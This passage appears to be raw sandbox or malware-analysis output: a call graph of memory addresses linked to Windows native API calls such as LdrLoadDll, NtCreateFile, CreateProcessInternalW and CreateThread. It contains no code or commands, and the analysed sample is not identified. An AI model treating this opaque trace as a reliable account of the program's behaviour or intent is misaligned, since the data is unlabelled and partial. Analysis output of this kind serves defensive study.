2998b85 23364->23365 23365->23270 23367 29a6e5f 23366->23367 23413 29a6d20 23367->23413 23369 29a6e75 23416 2998a30 23369->23416 23373 29a6e85 23424 29a3e50 23373->23424 23375 2998ac3 23376 29a6d00 23375->23376 23449 29a8880 23376->23449 23380 29aa140 LdrLoadDll 23379->23380 23381 29a9915 23380->23381 23382 29a3df0 LdrLoadDll 23381->23382 23383 2998af9 23381->23383 23382->23381 23384 29a9530 23383->23384 23385 2998a30 LdrLoadDll 23384->23385 23386 29a9549 23385->23386 23456 29a3a50 23386->23456 23388 29a9561 23389 29a956a 23388->23389 23495 29a9370 23388->23495 23389->23337 23391 29a957e 23391->23389 23392 29aa0f0 LdrLoadDll 23391->23392 23393 29a959f 23392->23393 23515 29a8180 23393->23515 23782 2996e20 23398->23782 23400 29988ea 23401 29988f1 23400->23401 23795 2997030 23400->23795 23401->23339 23403 29aa0f0 LdrLoadDll 23405 2998907 23403->23405 23404 29a3df0 LdrLoadDll 23404->23405 23405->23403 23405->23404 23407 299898c 23405->23407 23800 2997060 23405->23800 23805 29970e0 23407->23805 23410->23341 23411->23343 23412->23345 23414 29aa140 LdrLoadDll 23413->23414 23415 29a6d46 23414->23415 23415->23369 23417 2998a40 23416->23417 23418 29a98f0 LdrLoadDll 23417->23418 23419 2998a46 23418->23419 23420 29989e0 23419->23420 23421 29989f1 23420->23421 23431 29a9b20 23421->23431 23423 29989f7 23423->23373 23425 29a3e5e 23424->23425 23429 29a3e6a 23424->23429 23426 29a3df0 LdrLoadDll 23425->23426 23427 29a3ef6 23425->23427 23425->23429 23426->23425 23427->23429 23448 29a42d0 LdrLoadDll 23427->23448 23429->23375 23430 29a3fbc 23430->23375 23433 29a9b49 23431->23433 23435 29a9b54 23433->23435 23436 29aa0f0 23433->23436 23440 29a3df0 23433->23440 23435->23423 23437 29aa0fa 23436->23437 23438 29aa106 23436->23438 23439 29aa140 LdrLoadDll 23437->23439 23438->23433 23439->23438 23441 29aa0f0 LdrLoadDll 23440->23441 23442 29a3e0c 23441->23442 23445 2998bd0 23442->23445 23444 29a3e32 23444->23433 23446 29aa140 LdrLoadDll 23445->23446 23447 2998bf7 23446->23447 23447->23444 23448->23430 23452 29a91e0 23449->23452 23451 29a6d15 23451->23333 23453 29a91f0 23452->23453 23454 29a9212 23452->23454 23455 29a3e50 LdrLoadDll 23453->23455 23454->23451 23455->23454 23457 29a3d85 23456->23457 23458 29a3a64 23456->23458 23457->23388 23458->23457 23523 29a7ed0 23458->23523 23461 29a3b73 23584 29a86e0 LdrLoadDll 23461->23584 23462 29a3b90 23526 29a85e0 23462->23526 23465 29a3b7d 23465->23388 23466 29a3bb7 23467 29aa0a0 2 API calls 23466->23467 23470 29a3bc3 23467->23470 23468 29a3d49 23469 29a8710 2 API calls 23468->23469 23472 29a3d50 23469->23472 23470->23465 23470->23468 23471 29a3d5f 23470->23471 23475 29a3c52 23470->23475 23593 29a3790 LdrLoadDll NtReadFile NtClose 23471->23593 23472->23388 23474 29a3d72 23474->23388 23476 29a3cb9 23475->23476 23478 29a3c61 23475->23478 23476->23468 23477 29a3ccc 23476->23477 23586 29a8560 23477->23586 23480 29a3c7a 23478->23480 23481 29a3c66 23478->23481 23482 29a3c7f 23480->23482 23483 29a3c97 23480->23483 23585 29a3650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 23481->23585 23529 29a36f0 23482->23529 23483->23472 23542 29a3410 23483->23542 23488 29a3c70 23488->23388 23489 29a3c8d 23489->23388 23491 29a3d2c 23590 29a8710 23491->23590 23492 29a3caf 23492->23388 23494 29a3d38 23494->23388 23496 29a9381 23495->23496 23497 29a9393 23496->23497 23615 29aa020 23496->23615 23497->23391 23499 29a93b4 23618 29a3060 23499->23618 23501 29a9400 23501->23391 23502 29a93d7 23502->23501 23503 29a3060 3 API calls 23502->23503 23504 29a93f9 23503->23504 23504->23501 23650 29a4390 23504->23650 23506 29a948a 23507 29a949a 23506->23507 23747 29a9180 LdrLoadDll 23506->23747 23663 29a8ff0 23507->23663 23511 29aa0f0 LdrLoadDll 23512 29a94e2 23511->23512 23742 29a8140 23512->23742 23516 29a91e0 LdrLoadDll 23515->23516 23517 29a819c 23516->23517 23776 336967a 23517->23776 23518 29a81b7 23520 29aa0a0 23518->23520 23779 29a88f0 23520->23779 23522 29a95d9 23522->23337 23524 29a91e0 LdrLoadDll 23523->23524 23525 29a3b44 23524->23525 23525->23461 23525->23462 23525->23465 23527 29a91e0 LdrLoadDll 23526->23527 23528 29a85fc NtCreateFile 23527->23528 23528->23466 23530 29aa0f0 LdrLoadDll 23529->23530 23531 29a370c 23530->23531 23532 29a8560 LdrLoadDll 23531->23532 23533 29a372d 23532->23533 23534 29a3748 23533->23534 23535 29a3734 23533->23535 23537 29a8710 2 API calls 23534->23537 23536 29a8710 2 API calls 23535->23536 23538 29a373d 23536->23538 23539 29a3751 23537->23539 23538->23489 23594 29aa2b0 LdrLoadDll RtlAllocateHeap 23539->23594 23541 29a375c 23541->23489 23543 29a345b 23542->23543 23544 29a348e 23542->23544 23545 29a8560 LdrLoadDll 23543->23545 23546 29a35d9 23544->23546 23549 29a34aa 23544->23549 23547 29a3476 23545->23547 23548 29a8560 LdrLoadDll 23546->23548 23550 29a8710 2 API calls 23547->23550 23554 29a35f4 23548->23554 23551 29a8560 LdrLoadDll 23549->23551 23552 29a347f 23550->23552 23553 29a34c5 23551->23553 23552->23492 23556 29a34cc 23553->23556 23557 29a34e1 23553->23557 23611 29a85a0 LdrLoadDll 23554->23611 23559 29a8710 2 API calls 23556->23559 23560 29a34fc 23557->23560 23561 29a34e6 23557->23561 23558 29a362e 23562 29a8710 2 API calls 23558->23562 23563 29a34d5 23559->23563 23570 29a3501 23560->23570 23595 29aa270 23560->23595 23564 29a8710 2 API calls 23561->23564 23565 29a3639 23562->23565 23563->23492 23566 29a34ef 23564->23566 23565->23492 23566->23492 23567 29a3513 23567->23492 23570->23567 23600 29a8690 23570->23600 23571 29a3567 23576 29a357e 23571->23576 23610 29a8520 LdrLoadDll 23571->23610 23573 29a359a 23575 29a8710 2 API calls 23573->23575 23574 29a3585 23577 29a8710 2 API calls 23574->23577 23578 29a35a3 23575->23578 23576->23573 23576->23574 23577->23567 23579 29a35cf 23578->23579 23603 29a9e70 23578->23603 23579->23492 23581 29a35ba 23582 29aa0a0 2 API calls 23581->23582 23583 29a35c3 23582->23583 23583->23492 23584->23465 23585->23488 23587 29a3d14 23586->23587 23588 29a91e0 LdrLoadDll 23586->23588 23589 29a85a0 LdrLoadDll 23587->23589 23588->23587 23589->23491 23591 29a91e0 LdrLoadDll 23590->23591 23592 29a872c NtClose 23591->23592 23592->23494 23593->23474 23594->23541 23612 29a88b0 23595->23612 23597 29aa288 23598 29aa29e 23597->23598 23599 29aa140 LdrLoadDll 23597->23599 23598->23570 23599->23598 23601 29a91e0 LdrLoadDll 23600->23601 23602 29a86ac NtReadFile 23601->23602 23602->23571 23604 29a9e7d 23603->23604 23605 29a9e94 23603->23605 23604->23605 23606 29aa270 2 API calls 23604->23606 23605->23581 23607 29a9eab 23606->23607 23608 29aa0f0 LdrLoadDll 23607->23608 23609 29a9eb7 23608->23609 23609->23581 23610->23576 23611->23558 23613 29a91e0 LdrLoadDll 23612->23613 23614 29a88cc RtlAllocateHeap 23613->23614 23614->23597 23748 29a87c0 23615->23748 23617 29aa04d 23617->23499 23619 29a3071 23618->23619 23620 29a3079 23618->23620 23619->23502 23649 29a334c 23620->23649 23751 29ab250 23620->23751 23622 29a30cd 23623 29ab250 2 API calls 23622->23623 23626 29a30d8 23623->23626 23624 29a3126 23627 29ab250 2 API calls 23624->23627 23626->23624 23759 29ab2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 23626->23759 23760 29ab380 23626->23760 23631 29a313a 23627->23631 23629 29a3197 23630 29ab250 2 API calls 23629->23630 23632 29a31ad 23630->23632 23631->23629 23633 29ab380 3 API calls 23631->23633 23634 29a31ea 23632->23634 23636 29ab380 3 API calls 23632->23636 23633->23631 23635 29ab250 2 API calls 23634->23635 23637 29a31f5 23635->23637 23636->23632 23638 29ab380 3 API calls 23637->23638 23645 29a322f 23637->23645 23638->23637 23641 29ab2b0 2 API calls 23642 29a332e 23641->23642 23643 29ab2b0 2 API calls 23642->23643 23644 29a3338 23643->23644 23646 29ab2b0 2 API calls 23644->23646 23756 29ab2b0 23645->23756 23647 29a3342 23646->23647 23648 29ab2b0 2 API calls 23647->23648 23648->23649 23649->23502 23651 2998a30 LdrLoadDll 23650->23651 23652 29a43a1 23651->23652 23653 29a3a50 8 API calls 23652->23653 23655 29a43b7 23653->23655 23654 29a440a 23654->23506 23655->23654 23766 29aabb0 LdrLoadDll 23655->23766 23657 29a43e9 23658 29a43f2 23657->23658 23659 29a4405 23657->23659 23660 29aa0a0 2 API calls 23658->23660 23661 29aa0a0 2 API calls 23659->23661 23662 29a43f7 23660->23662 23661->23654 23662->23506 23767 29a8eb0 23663->23767 23666 29a8eb0 LdrLoadDll 23667 29a900d 23666->23667 23668 29a8eb0 LdrLoadDll 23667->23668 23669 29a9016 23668->23669 23670 29a8eb0 LdrLoadDll 23669->23670 23671 29a901f 23670->23671 23672 29a8eb0 LdrLoadDll 23671->23672 23673 29a9028 23672->23673 23674 29a8eb0 LdrLoadDll 23673->23674 23675 29a9031 23674->23675 23676 29a8eb0 LdrLoadDll 23675->23676 23677 29a903d 23676->23677 23678 29a8eb0 LdrLoadDll 23677->23678 23679 29a9046 23678->23679 23680 29a8eb0 LdrLoadDll 23679->23680 23681 29a904f 23680->23681 23682 29a8eb0 LdrLoadDll 23681->23682 23683 29a9058 23682->23683 23684 29a8eb0 LdrLoadDll 23683->23684 23685 29a9061 23684->23685 23686 29a8eb0 LdrLoadDll 23685->23686 23687 29a906a 23686->23687 23688 29a8eb0 LdrLoadDll 23687->23688 23689 29a9076 23688->23689 23690 29a8eb0 LdrLoadDll 23689->23690 23691 29a907f 23690->23691 23692 29a8eb0 LdrLoadDll 23691->23692 23693 29a9088 23692->23693 23694 29a8eb0 LdrLoadDll 23693->23694 23695 29a9091 23694->23695 23696 29a8eb0 LdrLoadDll 23695->23696 23697 29a909a 23696->23697 23698 29a8eb0 LdrLoadDll 23697->23698 23699 29a90a3 23698->23699 23700 29a8eb0 LdrLoadDll 23699->23700 23701 29a90af 23700->23701 23702 29a8eb0 LdrLoadDll 23701->23702 23703 29a90b8 23702->23703 23704 29a8eb0 LdrLoadDll 23703->23704 23705 29a90c1 23704->23705 23706 29a8eb0 LdrLoadDll 23705->23706 23707 29a90ca 23706->23707 23708 29a8eb0 LdrLoadDll 23707->23708 23709 29a90d3 23708->23709 23710 29a8eb0 LdrLoadDll 23709->23710 23711 29a90dc 23710->23711 23712 29a8eb0 LdrLoadDll 23711->23712 23713 29a90e8 23712->23713 23714 29a8eb0 LdrLoadDll 23713->23714 23715 29a90f1 23714->23715 23716 29a8eb0 LdrLoadDll 23715->23716 23717 29a90fa 23716->23717 23718 29a8eb0 LdrLoadDll 23717->23718 23719 29a9103 23718->23719 23720 29a8eb0 LdrLoadDll 23719->23720 23721 29a910c 23720->23721 23722 29a8eb0 LdrLoadDll 23721->23722 23723 29a9115 23722->23723 23724 29a8eb0 LdrLoadDll 23723->23724 23725 29a9121 23724->23725 23726 29a8eb0 LdrLoadDll 23725->23726 23727 29a912a 23726->23727 23728 29a8eb0 LdrLoadDll 23727->23728 23729 29a9133 23728->23729 23730 29a8eb0 LdrLoadDll 23729->23730 23731 29a913c 23730->23731 23732 29a8eb0 LdrLoadDll 23731->23732 23733 29a9145 23732->23733 23734 29a8eb0 LdrLoadDll 23733->23734 23735 29a914e 23734->23735 23736 29a8eb0 LdrLoadDll 23735->23736 23737 29a915a 23736->23737 23738 29a8eb0 LdrLoadDll 23737->23738 23739 29a9163 23738->23739 23740 29a8eb0 LdrLoadDll 23739->23740 23741 29a916c 23740->23741 23741->23511 23743 29a91e0 LdrLoadDll 23742->23743 23744 29a815c 23743->23744 23775 3369860 LdrInitializeThunk 23744->23775 23745 29a8173 23745->23391 23747->23507 23749 29a87dc NtAllocateVirtualMemory 23748->23749 23750 29a91e0 LdrLoadDll 23748->23750 23749->23617 23750->23749 23752 29ab260 23751->23752 23753 29ab266 23751->23753 23752->23622 23754 29aa270 2 API calls 23753->23754 23755 29ab28c 23754->23755 23755->23622 23757 29aa0a0 2 API calls 23756->23757 23758 29a3324 23757->23758 23758->23641 23759->23626 23761 29ab2f0 23760->23761 23762 29aa270 2 API calls 23761->23762 23763 29ab34d 23761->23763 23764 29ab32a 23762->23764 23763->23626 23765 29aa0a0 2 API calls 23764->23765 23765->23763 23766->23657 23768 29a8ecb 23767->23768 23769 29a3e50 LdrLoadDll 23768->23769 23770 29a8eeb 23769->23770 23771 29a3df0 LdrLoadDll 23770->23771 23772 29a8f4e 23770->23772 23774 29a8f97 23770->23774 23771->23770 23773 29a3e50 LdrLoadDll 23772->23773 23772->23774 23773->23774 23774->23666 23775->23745 23777 3369681 23776->23777 23778 336968f LdrInitializeThunk 23776->23778 23777->23518 23778->23518 23780 29a91e0 LdrLoadDll 23779->23780 23781 29a890c RtlFreeHeap 23780->23781 23781->23522 23783 2996e2b 23782->23783 23784 2996e30 23782->23784 23783->23400 23785 29aa020 2 API calls 23784->23785 23791 2996e55 23785->23791 23786 2996eb8 23786->23400 23787 29a8140 2 API calls 23787->23791 23788 2996ebe 23790 2996ee4 23788->23790 23792 29a8840 2 API calls 23788->23792 23790->23400 23791->23786 23791->23787 23791->23788 23793 29aa020 2 API calls 23791->23793 23808 29a8840 23791->23808 23794 2996ed5 23792->23794 23793->23791 23794->23400 23796 2997059 23795->23796 23797 299703a 23795->23797 23796->23405 23797->23796 23814 2996f00 LdrLoadDll 23797->23814 23799 2997054 23799->23405 23801 299706a 23800->23801 23802 2997093 23800->23802 23801->23802 23815 2996f00 LdrLoadDll 23801->23815 23802->23405 23804 299708e 23804->23405 23806 29970fe 23805->23806 23807 29a8840 2 API calls 23805->23807 23806->23339 23807->23806 23809 29a885c 23808->23809 23810 29a91e0 LdrLoadDll 23808->23810 23813 33696e0 LdrInitializeThunk 23809->23813 23810->23809 23811 29a8873 23811->23791 23813->23811 23814->23799 23815->23804 23817 29aa140 LdrLoadDll 23816->23817 23818 29a9843 23817->23818 23821 2999b40 23818->23821 23820 2998a6a 23820->23349 23823 2999b64 23821->23823 23822 2999b6b 23822->23820 23823->23822 23824 2999ba0 LdrLoadDll 23823->23824 23825 2999bb7 23823->23825 23824->23825 23825->23820 23827 29aa140 LdrLoadDll 23826->23827 23828 2999eb3 23827->23828 23829 29aa140 LdrLoadDll 23828->23829 23830 2999ece 23829->23830 23831 29aa140 LdrLoadDll 23830->23831 23834 2999f30 23830->23834 23832 2999f7d 23831->23832 23846 29a7f10 LdrLoadDll 23832->23846 23834->23357 23836 29a91e0 LdrLoadDll 23835->23836 23837 299cfab 23836->23837 23837->23365 23838 29a8a50 23837->23838 23839 29a91e0 LdrLoadDll 23838->23839 23840 29a8a6f LookupPrivilegeValueW 23839->23840 23840->23361 23842 29a91e0 LdrLoadDll 23841->23842 23843 29a84fc 23842->23843 23847 3369910 LdrInitializeThunk 23843->23847 23844 29a851b 23844->23362 23846->23834 23847->23844 23849 29aa140 LdrLoadDll 23848->23849 23850 299a037 23849->23850 23851 29aa140 LdrLoadDll 23850->23851 23852 299a052 23851->23852 23853 2999e90 LdrLoadDll 23852->23853 23854 299a066 23853->23854 23854->23294 23856 29aa140 LdrLoadDll 23855->23856 23857 2999d84 23855->23857 23856->23857 23930 29a7f10 LdrLoadDll 23857->23930 23859 2999dbe 23859->23296 23861 29aa140 LdrLoadDll 23860->23861 23862 299d19c 23861->23862 23863 299a010 LdrLoadDll 23862->23863 23864 299d1ae 23863->23864 23931 299d080 23864->23931 23867 299d1c9 23869 299d1d4 23867->23869 23871 29a8710 2 API calls 23867->23871 23868 299d1e1 23870 299d1f2 23868->23870 23872 29a8710 2 API calls 23868->23872 23869->23299 23870->23299 23871->23869 23872->23870 23874 299aef0 23873->23874 23875 299aee6 23873->23875 23876 29aa140 LdrLoadDll 23874->23876 23875->23308 23877 299af0c 23876->23877 23878 29aa140 LdrLoadDll 23877->23878 23879 299af1c 23878->23879 23880 29aa140 LdrLoadDll 23879->23880 23881 299af2c 23880->23881 23882 29aa140 LdrLoadDll 23881->23882 23883 299af53 23882->23883 23884 2999e90 LdrLoadDll 23883->23884 23885 299af61 23884->23885 23886 2999d60 LdrLoadDll 23885->23886 23887 299af75 23886->23887 23888 299af98 23887->23888 23889 2999e90 LdrLoadDll 23887->23889 23888->23308 23890 299afb4 23889->23890 23952 29aa5f0 23890->23952 23892 299afc1 23893 29a3a50 8 API calls 23892->23893 23894 299b009 23893->23894 23894->23308 23896 299ba66 23895->23896 23897 29aa140 LdrLoadDll 23895->23897 23898 2999e90 LdrLoadDll 23896->23898 23897->23896 23899 299ba7a 23898->23899 23957 299b730 23899->23957 23901 2997f8c 23928 299b020 LdrLoadDll 23901->23928 23996 299d430 23902->23996 23905 29aa140 LdrLoadDll 23907 2997ca0 23905->23907 23906 2997e31 23906->23320 23907->23906 24001 29a33a0 23907->24001 23909 2997ce2 23909->23906 23910 29aa140 LdrLoadDll 23909->23910 23911 2997d02 23910->23911 24004 2997a20 23911->24004 23914 29ab250 2 API calls 23915 2997d29 23914->23915 23916 29ab380 3 API calls 23915->23916 23923 2997d3e 23916->23923 23917 2996e20 4 API calls 23917->23923 23919 2997030 LdrLoadDll 23919->23923 23920 29aa0f0 LdrLoadDll 23920->23923 23922 29a3df0 LdrLoadDll 23922->23923 23923->23906 23923->23917 23923->23919 23923->23920 23923->23922 23925 29970e0 2 API calls 23923->23925 23926 2997060 LdrLoadDll 23923->23926 24009 299ac00 23923->24009 24063 299d3d0 23923->24063 24067 299ceb0 21 API calls 23923->24067 23925->23923 23926->23923 23927->23303 23928->23313 23929->23322 23930->23859 23932 299d09a 23931->23932 23942 299d150 23931->23942 23933 29aa140 LdrLoadDll 23932->23933 23934 299d0ab 23933->23934 23935 2999e90 LdrLoadDll 23934->23935 23936 299d0bc 23935->23936 23943 29a81c0 23936->23943 23938 299d0fe 23946 29a8200 23938->23946 23941 29a8710 2 API calls 23941->23942 23942->23867 23942->23868 23944 29a91e0 LdrLoadDll 23943->23944 23945 29a81dc 23943->23945 23944->23945 23945->23938 23947 29a91e0 LdrLoadDll 23946->23947 23948 29a821c 23947->23948 23951 3369fe0 LdrInitializeThunk 23948->23951 23949 299d144 23949->23941 23951->23949 23953 29aa69d 23952->23953 23954 29aa604 23952->23954 23953->23892 23954->23953 23955 29aa140 LdrLoadDll 23954->23955 23956 29aa62e 23955->23956 23956->23892 23958 29aa140 LdrLoadDll 23957->23958 23959 299b747 23958->23959 23960 29aa140 LdrLoadDll 23959->23960 23961 299b77b 23960->23961 23969 299d470 23961->23969 23965 299b7bb 23966 299b7c2 23965->23966 23984 29a8520 LdrLoadDll 23965->23984 23966->23901 23968 299b7d5 23968->23901 23970 29aa140 LdrLoadDll 23969->23970 23971 299d495 23970->23971 23972 2998a30 LdrLoadDll 23971->23972 23973 299d4a0 23972->23973 23985 2997120 23973->23985 23976 299b78f 23981 29a8960 23976->23981 23977 29a3a50 8 API calls 23979 299d4b9 23977->23979 23979->23976 23979->23977 23980 29aa0a0 2 API calls 23979->23980 23994 29aac40 LdrLoadDll 23979->23994 23995 299d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 23979->23995 23980->23979 23982 29a897f CreateProcessInternalW 23981->23982 23983 29a91e0 LdrLoadDll 23981->23983 23982->23965 23983->23982 23984->23968 23986 299721f 23985->23986 23987 2997135 23985->23987 23986->23979 23987->23986 23988 29aa140 LdrLoadDll 23987->23988 23989 2997168 23988->23989 23990 29a3a50 8 API calls 23989->23990 23991 29971a2 23990->23991 23992 29aa0a0 2 API calls 23991->23992 23993 29971c9 23991->23993 23992->23993 23993->23979 23994->23979 23995->23979 23997 29a3e50 LdrLoadDll 23996->23997 23998 299d44f 23997->23998 23999 2997c83 23998->23999 24000 299d456 SetErrorMode 23998->24000 23999->23905 24000->23999 24068 299d200 24001->24068 24003 29a33c6 24003->23909 24005 2997a45 24004->24005 24006 29aa020 2 API calls 24004->24006 24007 2997c5a 24005->24007 24087 29a7b00 24005->24087 24006->24005 24007->23914 24010 299ac19 24009->24010 24011 299ac1f 24009->24011 24151 299ccc0 24010->24151 24160 2998620 24011->24160 24014 299ac2c 24015 29ab380 3 API calls 24014->24015 24062 299aeb8 24014->24062 24016 299ac48 24015->24016 24017 299ac5c 24016->24017 24018 299d3d0 2 API calls 24016->24018 24019 29aa140 LdrLoadDll 24017->24019 24018->24017 24020 299ac71 24019->24020 24171 29a7f90 24020->24171 24023 299ad86 24025 29aa140 LdrLoadDll 24023->24025 24024 29a8180 2 API calls 24026 299acda 24024->24026 24027 299ad95 24025->24027 24026->24023 24031 299ace6 24026->24031 24192 299aba0 LdrLoadDll LdrInitializeThunk 24027->24192 24029 299ada5 24030 299adad 24029->24030 24193 299ab10 LdrLoadDll NtClose LdrInitializeThunk 24029->24193 24032 29a8710 2 API calls 24030->24032 24035 29a8290 2 API calls 24031->24035 24041 299ad2f 24031->24041 24031->24062 24036 299adb7 24032->24036 24034 299adcf 24034->24030 24040 299add6 24034->24040 24035->24041 24036->23923 24037 29a8710 2 API calls 24038 299ad4c 24037->24038 24174 29a75b0 24038->24174 24045 299adee 24040->24045 24194 299aa90 LdrLoadDll LdrInitializeThunk 24040->24194 24041->24037 24042 299ad63 24042->24062 24179 2997280 24042->24179 24195 29a8010 LdrLoadDll 24045->24195 24046 299ae02 24196 299a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 24046->24196 24050 299ae26 24051 299ae73 24050->24051 24197 29a8040 LdrLoadDll 24050->24197 24199 29a80a0 LdrLoadDll 24051->24199 24054 299ae81 24056 29a8710 2 API calls 24054->24056 24055 299ae44 24055->24051 24198 29a80d0 LdrLoadDll 24055->24198 24057 299ae8b 24056->24057 24059 29a8710 2 API calls 24057->24059 24060 299ae95 24059->24060 24061 2997280 3 API calls 24060->24061 24060->24062 24061->24062 24062->23923 24064 299d3e3 24063->24064 24296 29a8110 24064->24296 24067->23923 24069 299d21d 24068->24069 24075 29a8240 24069->24075 24072 299d265 24072->24003 24076 29a91e0 LdrLoadDll 24075->24076 24077 29a825c 24076->24077 24085 33699a0 LdrInitializeThunk 24077->24085 24078 299d25e 24078->24072 24080 29a8290 24078->24080 24081 29a91e0 LdrLoadDll 24080->24081 24082 29a82ac 24081->24082 24086 3369780 LdrInitializeThunk 24082->24086 24083 299d28e 24083->24003 24085->24078 24086->24083 24088 29aa270 2 API calls 24087->24088 24089 29a7b17 24088->24089 24112 2998160 24089->24112 24091 29a7b32 24092 29a7b59 24091->24092 24093 29a7b70 24091->24093 24094 29aa0a0 2 API calls 24092->24094 24096 29aa020 2 API calls 24093->24096 24095 29a7b66 24094->24095 24095->24007 24097 29a7baa 24096->24097 24098 29aa020 2 API calls 24097->24098 24099 29a7bc3 24098->24099 24123 29a79e0 LdrLoadDll 24099->24123 24101 29a7c05 24124 29a79e0 LdrLoadDll 24101->24124 24103 29a7c40 24109 29a7e64 24103->24109 24125 29aa060 LdrLoadDll 24103->24125 24105 29a7e49 24106 29a7e50 24105->24106 24105->24109 24107 29aa0a0 2 API calls 24106->24107 24108 29a7e5a 24107->24108 24108->24007 24110 29aa0a0 2 API calls 24109->24110 24111 29a7eb9 24110->24111 24111->24007 24113 2998185 24112->24113 24114 29aa140 LdrLoadDll 24112->24114 24115 29aa140 LdrLoadDll 24113->24115 24114->24113 24116 299819d 24115->24116 24126 29aad20 24116->24126 24118 29981a8 24119 2999b40 LdrLoadDll 24118->24119 24120 29981b8 24119->24120 24122 29981dd 24120->24122 24130 299b340 24120->24130 24122->24091 24123->24101 24124->24103 24125->24105 24127 29aad38 24126->24127 24129 29aaed5 24126->24129 24128 29aa140 LdrLoadDll 24127->24128 24128->24129 24129->24118 24131 299b36c 24130->24131 24132 29aa140 LdrLoadDll 24130->24132 24133 29a8460 LdrLoadDll 24131->24133 24132->24131 24134 299b385 24133->24134 24135 299b38c 24134->24135 24142 29a84a0 24134->24142 24135->24122 24139 299b3c7 24140 29a8710 2 API calls 24139->24140 24141 299b3ea 24140->24141 24141->24122 24143 29a91e0 LdrLoadDll 24142->24143 24144 29a84bc 24143->24144 24150 3369710 LdrInitializeThunk 24144->24150 24145 299b3af 24145->24135 24147 29a8a90 24145->24147 24148 29a91e0 LdrLoadDll 24147->24148 24149 29a8aaf 24148->24149 24149->24139 24150->24145 24154 299ccd7 24151->24154 24200 299bdb0 24151->24200 24153 299ccf0 24156 29aa270 2 API calls 24153->24156 24154->24153 24214 2993d70 24154->24214 24158 299ccfe 24156->24158 24157 299ccea 24253 29a7430 24157->24253 24158->24011 24161 299863b 24160->24161 24162 29aa140 LdrLoadDll 24161->24162 24163 299875b 24161->24163 24164 299867e 24162->24164 24163->24014 24165 299d080 3 API calls 24164->24165 24166 299873c 24165->24166 24167 299876a 24166->24167 24168 2998751 24166->24168 24169 29a8710 2 API calls 24166->24169 24167->24014 24294 2995ea0 LdrLoadDll 24168->24294 24169->24168 24172 29a91e0 LdrLoadDll 24171->24172 24173 299acb0 24172->24173 24173->24023 24173->24024 24173->24062 24175 299d3d0 2 API calls 24174->24175 24176 29a75e2 24175->24176 24178 29a75f6 24176->24178 24295 29970a0 LdrLoadDll 24176->24295 24178->24042 24180 29aa140 LdrLoadDll 24179->24180 24181 2997298 24180->24181 24182 29aad20 LdrLoadDll 24181->24182 24183 29972a3 24182->24183 24184 2999b40 LdrLoadDll 24183->24184 24185 29972b3 24184->24185 24186 29a3e50 LdrLoadDll 24185->24186 24187 29972c3 24186->24187 24188 29972cc PostThreadMessageW 24187->24188 24189 29972fd 24187->24189 24188->24189 24190 29972e0 24188->24190 24189->23923 24191 29972ea PostThreadMessageW 24190->24191 24191->24189 24192->24029 24193->24034 24194->24045 24195->24046 24196->24050 24197->24055 24198->24051 24199->24054 24201 29aa140 LdrLoadDll 24200->24201 24202 299bde3 24201->24202 24258 299a150 24202->24258 24204 299bdf5 24267 299a2c0 24204->24267 24206 299be13 24207 299a2c0 LdrLoadDll 24206->24207 24208 299be29 24207->24208 24209 299d200 3 API calls 24208->24209 24210 299be4d 24209->24210 24211 299be54 24210->24211 24270 29aa2b0 LdrLoadDll RtlAllocateHeap 24210->24270 24211->24154 24213 299be64 24213->24154 24215 29aa140 LdrLoadDll 24214->24215 24216 2993d96 24215->24216 24217 29aa140 LdrLoadDll 24216->24217 24218 2993db0 24217->24218 24219 29aa140 LdrLoadDll 24218->24219 24220 2993dcb 24219->24220 24221 29aa140 LdrLoadDll 24220->24221 24222 2993ded 24221->24222 24223 299b340 3 API calls 24222->24223 24225 2993e61 24223->24225 24224 2993e68 24224->24157 24225->24224 24226 2998bd0 LdrLoadDll 24225->24226 24227 2993e8a 24226->24227 24272 29aa2f0 24227->24272 24229 2993ec9 24230 29aa140 LdrLoadDll 24229->24230 24231 2993f7d 24230->24231 24232 2999e90 LdrLoadDll 24231->24232 24233 2993fd3 24232->24233 24234 2999e90 LdrLoadDll 24233->24234 24235 2993ff7 24234->24235 24277 299b400 24235->24277 24239 2994083 24240 29aa020 2 API calls 24239->24240 24241 2994110 24240->24241 24242 29aa020 2 API calls 24241->24242 24244 299412a 24242->24244 24243 29942a6 24243->24157 24244->24243 24245 2999e90 LdrLoadDll 24244->24245 24246 299416a 24245->24246 24247 29aa5f0 LdrLoadDll 24246->24247 24248 299417d 24247->24248 24249 29aa140 LdrLoadDll 24248->24249 24250 29941f6 24249->24250 24251 2999d60 LdrLoadDll 24250->24251 24252 299420a 24251->24252 24252->24157 24254 29a3e50 LdrLoadDll 24253->24254 24255 29a7451 24254->24255 24256 29a7477 24255->24256 24257 29a7464 CreateThread 24255->24257 24256->24153 24257->24153 24259 29aa140 LdrLoadDll 24258->24259 24260 299a177 24259->24260 24261 29aa140 LdrLoadDll 24260->24261 24262 299a192 24261->24262 24271 2998780 LdrLoadDll 24262->24271 24264 299a1a4 24265 2999e90 LdrLoadDll 24264->24265 24266 299a1b3 24265->24266 24266->24204 24268 2999e90 LdrLoadDll 24267->24268 24269 299a2d9 24268->24269 24269->24206 24270->24213 24271->24264 24273 29a98f0 LdrLoadDll 24272->24273 24274 29aa2fd 24273->24274 24275 29a3e50 LdrLoadDll 24274->24275 24276 29aa310 24275->24276 24276->24229 24278 29aa140 LdrLoadDll 24277->24278 24279 299b425 24277->24279 24278->24279 24287 29a8310 24279->24287 24282 29a83a0 24283 29a91e0 LdrLoadDll 24282->24283 24284 29a83bc 24283->24284 24293 3369650 LdrInitializeThunk 24284->24293 24285 29a83db 24285->24239 24288 29a91e0 LdrLoadDll 24287->24288 24289 29a832c 24288->24289 24292 33696d0 LdrInitializeThunk 24289->24292 24290 299405c 24290->24239 24290->24282 24292->24290 24293->24285 24294->24163 24295->24178 24297 29a91e0 LdrLoadDll 24296->24297 24298 29a812c 24297->24298 24301 3369840 LdrInitializeThunk 24298->24301 24299 299d40e 24299->23923 24301->24299 24302 29a7300 24303 29a733b 24302->24303 24304 29aa020 2 API calls 24302->24304 24305 29a741c 24303->24305 24306 29aa0f0 LdrLoadDll 24303->24306 24304->24303 24307 29a7353 24306->24307 24308 2999b40 LdrLoadDll 24307->24308 24309 29a7371 24308->24309 24310 29a3e50 LdrLoadDll 24309->24310 24312 29a738d 24310->24312 24311 29a73a0 Sleep 24311->24312 24312->24305 24312->24311 24315 29a6f30 LdrLoadDll 24312->24315 24316 29a7130 LdrLoadDll 24312->24316 24315->24312 24316->24312

                  Executed Functions

